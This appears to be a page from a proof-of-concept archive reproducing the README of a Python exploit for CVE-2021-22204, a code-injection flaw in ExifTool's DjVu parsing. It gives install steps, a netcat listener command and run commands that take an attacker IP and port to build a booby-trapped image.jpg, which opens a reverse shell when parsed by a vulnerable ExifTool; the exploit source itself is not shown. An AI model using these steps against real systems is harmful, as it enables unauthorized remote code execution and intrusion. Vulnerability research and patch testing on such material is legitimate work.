Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2021-22204 PoC — exiftool 代码注入漏洞

Source
Associated Vulnerability
Title: exiftool 代码注入漏洞 (CVE-2021-22204)
Description:Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
Description
exiftool exploit
Readme
# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
   ## Youtube 
        404 notfound
## Requirements 
    python3 python3-pip djvulibre-bin exiftool

# Install requirements 

   ## Debian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Ubuntu
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Arch Linux
        pacman -S djvulibre libimage-exiftool-perl python python-pip
    
   ## Kali Linux
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Fedora
        dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
    
   ## OS X
        brew install djvulibre exiftool python
    
   ## Raspbian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
 
# How to run:
   ## Install python requirements
        sudo pip install -r requirements.txt

   ## start reverse shell with natcat
        nc -nvlp 4444

   ## Give execute permission 
        chmod +x exploit.py
   ## Run program
        python3 exploit.py {Your IP add adress} {Your Listening port} 
        
   ### OR 
        
        ./exploit.py {Your IP add adress} {Your Listening port}
   ## Example
    
        python3 exploit.py 192.168.0.1 4444
        
   ### OR 
        
        ./exploit.py 192.168.0.1 4444
   ## Output file name is 
        image.jpg
        
# About the vulnerability

The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)

This exploit was made by studying the exiftool patch after the CVE was already reported.

And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →